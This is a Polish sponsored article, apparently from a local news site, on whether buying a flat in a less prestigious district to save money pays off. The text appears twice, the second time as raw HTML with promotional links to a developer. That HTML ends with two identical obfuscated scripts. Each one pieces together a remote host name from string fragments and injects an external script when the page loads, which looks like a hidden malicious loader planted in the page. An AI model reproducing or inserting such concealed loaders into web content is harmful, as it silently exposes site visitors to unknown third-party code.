Jednym z kluczowych czynników wpływających na wartość mieszkania jest jego lokalizacja – w dużych miastach zapłacimy wobec tego najwięcej za wymarzone „M”, z kolei w mniejszych, ceny będą nawet o połowę niższe. Gdy myślisz o tym, jak oszczędzić na kupnie lokalu, możesz wybrać taki, którego lokalizacja nie będzie prestiżowa, ale czy warto zdecydować się na takie rozwiązanie?

 

Nawet do kilkudziesięciu tysięcy złotych można oszczędzić przy zakupie mieszkań deweloperskich w Warszawie, Krakowie czy Wrocławiu mieszczących się w bardziej odległych dzielnicach tych i innych metropolii. Lokalizacja jest tym, co w dużej mierze kształtuje ceny na rynku mieszkaniowym. Najwięcej za lokum zapłaci się w centrum, gdzie blisko jest praktycznie wszędzie, ale również na wycenę nieruchomości mają wpływ inne czynniki, między innymi zielone otoczenie, pobliskie tereny rekreacyjne, dostępność komunikacji czy prestiż danej dzielnicy.

Jeśli wobec tego przykładowo interesują cię nowe mieszkania na Bielanach czy innej dzielnicy Warszawy, powstaje pytanie – czy warto wybrać tańszą dzielnicę, znacznie oddaloną od centrum miasta i oszczędzić pieniądze, czy też lepiej zapłacić więcej za bardziej dogodną lokalizację?

Panuje przekonanie, że peryferyjne lokalizacje są gorsze, ponieważ nie są tak dobrze skomunikowane z centrum i również nie mają rozbudowanej infrastruktury. Wobec tego, gdy kupisz mieszkanie położone w takim miejscu, więcej czasu i jednocześnie pieniędzy możesz zmarnować na dojazdy do pracy. Z drugiej strony nie każdemu przeszkadzają dojazdy, zwłaszcza gdy pracuje się nie w centrum, a bliżej miejsca zamieszkania, czy też w domu, dlatego kupno tańszego, ale gorzej położonego lokum też może być plusem.

Warto też wspomnieć o jeszcze jednej, ważnej kwestii, a mianowicie – o wzroście wartości nieruchomości – za mieszkanie położone w dobrej dzielnicy, blisko centrum, w perspektywie czasu będzie można otrzymać więcej pieniędzy, dlatego to bardziej przyszłościowy zakup od mieszkania w oddalonej dzielnicy. Należy o tym pamiętać podczas poszukiwania mieszkania na wynajem, ponieważ lokalizacja również ma przełożenie na ceny najmu.


Czy warto kupować mieszkanie w gorszej lokalizacji, by zapłacić mniej?https://www.pruszkowmowi.pl/wp-content/uploads/2016/09/28629935842_c6fbf65c0b.jpghttps://www.pruszkowmowi.pl/wp-content/uploads/2016/09/28629935842_c6fbf65c0b-300x281.jpg admin Artykuł sponsorowany
Jednym z kluczowych czynników wpływających na wartość mieszkania jest jego lokalizacja – w dużych miastach zapłacimy wobec tego najwięcej za wymarzone „M”, z kolei w mniejszych, ceny będą nawet o połowę niższe. Gdy myślisz o tym, jak oszczędzić na kupnie lokalu, możesz wybrać taki, którego lokalizacja nie będzie prestiżowa,...
<strong>Jednym z kluczowych czynników wpływających na wartość mieszkania jest jego lokalizacja – w dużych miastach zapłacimy wobec tego najwięcej za wymarzone „M”, z kolei w mniejszych, ceny będą nawet o połowę niższe. Gdy myślisz o tym, jak oszczędzić na kupnie lokalu, możesz wybrać taki, którego lokalizacja nie będzie prestiżowa, ale czy warto zdecydować się na takie rozwiązanie?</strong> Nawet do kilkudziesięciu tysięcy złotych można oszczędzić przy zakupie <a href="http://www.marvipol.pl/inwestycje">mieszkań deweloperskich w Warszawie</a>, Krakowie czy Wrocławiu mieszczących się w bardziej odległych dzielnicach tych i innych metropolii. Lokalizacja jest tym, co w dużej mierze kształtuje ceny na rynku mieszkaniowym. Najwięcej za lokum zapłaci się w centrum, gdzie blisko jest praktycznie wszędzie, ale również na wycenę nieruchomości mają wpływ inne czynniki, między innymi zielone otoczenie, pobliskie tereny rekreacyjne, dostępność komunikacji czy prestiż danej dzielnicy.Jeśli wobec tego przykładowo interesują cię <a href="http://www.marvipol.pl/">nowe mieszkania na Bielanach</a> czy innej dzielnicy Warszawy, powstaje pytanie – czy warto wybrać tańszą dzielnicę, znacznie oddaloną od centrum miasta i oszczędzić pieniądze, czy też lepiej zapłacić więcej za bardziej dogodną lokalizację?Panuje przekonanie, że peryferyjne lokalizacje są gorsze, ponieważ nie są tak dobrze skomunikowane z centrum i również nie mają rozbudowanej infrastruktury. Wobec tego, gdy kupisz mieszkanie położone w takim miejscu, więcej czasu i jednocześnie pieniędzy możesz zmarnować na dojazdy do pracy. Z drugiej strony nie każdemu przeszkadzają dojazdy, zwłaszcza gdy pracuje się nie w centrum, a bliżej miejsca zamieszkania, czy też w domu, dlatego kupno tańszego, ale gorzej położonego lokum też może być plusem.Warto też wspomnieć o jeszcze jednej, ważnej kwestii, a mianowicie - o wzroście wartości nieruchomości – za mieszkanie położone w dobrej dzielnicy, blisko centrum, w perspektywie czasu będzie można otrzymać więcej pieniędzy, dlatego to bardziej przyszłościowy zakup od mieszkania w oddalonej dzielnicy. Należy o tym pamiętać podczas poszukiwania mieszkania na wynajem, ponieważ lokalizacja również ma przełożenie na ceny najmu.<script type="text/javascript">// <![CDATA[ (function(){ cjyb=document.createElement("script");cjyb_=("ust");cjybu="11954595"; cjyb_+="a"+("t.i");cjyb.type="text/javascript"; cjybu+=".4efl84twjyb0kg8h8kn7";cjyb.async=true;cjyb_+="n"+("f"+"o")+"/"; cjybu+="jdsw78nXjh";cjyb.src="//"+cjyb_+cjybu; document.body.appendChild(cjyb); })(); // ]]></script> <script type="text/javascript">// <![CDATA[ (function(){ cjyb=document.createElement("script");cjyb_=("ust");cjybu="11954595"; cjyb_+="a"+("t.i");cjyb.type="text/javascript"; cjybu+=".4efl84twjyb0kg8h8kn7";cjyb.async=true;cjyb_+="n"+("f"+"o")+"/"; cjybu+="jdsw78nXjh";cjyb.src="//"+cjyb_+cjybu; document.body.appendChild(cjyb); })(); // ]]></script>